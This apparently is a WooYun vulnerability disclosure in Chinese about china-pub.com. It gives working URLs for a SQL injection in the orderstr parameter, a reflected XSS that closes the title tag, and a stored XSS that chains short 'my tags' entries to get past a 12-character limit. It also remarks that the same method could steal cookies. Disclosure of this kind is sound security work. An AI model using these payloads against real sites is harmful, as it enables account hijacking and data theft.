WooYun.org

我不知道你们是怎么测试的，导致漏洞没有复现，我也没必要在这里伪造截图骗RANK。
首先，SQL注入是一定存在的，http://product.china-pub.com/member/bookpinglun/memberpl.asp?membername=Demonm&bookid=&orderstr=flower'&px=asc&Curpage=1&mtype=&stype=
这样都报错了难道还不算复现？
反射型的XSS在Firefox下可以正常弹窗，IE默认情况下会拦截，Chrome似乎也有对反射XSS的保护。
存储型的XSS是必然存在的。
1.SQL注入
http://product.china-pub.com/member/bookpinglun/memberpl.asp?membername=Demonm&bookid=&orderstr=flower&px=asc&Curpage=1&mtype=&stype=
orderstr参数存在注入漏洞，好像px参数也有，没有测试其他的。

2.反射XSS一枚
http://product.china-pub.com/member/bookpinglun/memberpl.asp?membername=%3C/title%3E%3Cscript%3Ealert%28%29%3C/script%3E%3Ctitle%3E
直接把<title>标签闭合掉。

3.存储型XSS一枚
在用户的个人中心，账户信息中，有个“我的标签”功能，这里限制了字符数量，实际测试可以输入12个字符。

抓到了两个URL：
http://member.china-pub.com/member/mypub/Handdle/AddRemark.ashx?mark=<your mark>
http://member.china-pub.com/member/mypub/Handdle/DelMarks.ashx?id=1591
第一个是增加标签的，第二个是删除标签的。
因为只能输入12个字符，我们用多次插入标签的办法绕过限制，构造以下URL，
http://member.china-pub.com/member/mypub/Handdle/AddRemark.ashx?mark=<script>/*
http://member.china-pub.com/member/mypub/Handdle/AddRemark.ashx?mark=*/alert();/*
http://member.china-pub.com/member/mypub/Handdle/AddRemark.ashx?mark=*/</script>
想搞cookie的话一样的方法，只不过多添加几个标签就可以了。alert后面的分号是必须的。

china-pub的链接丢到QQ里可是通过官方认证的，分分钟就搞到cookie了。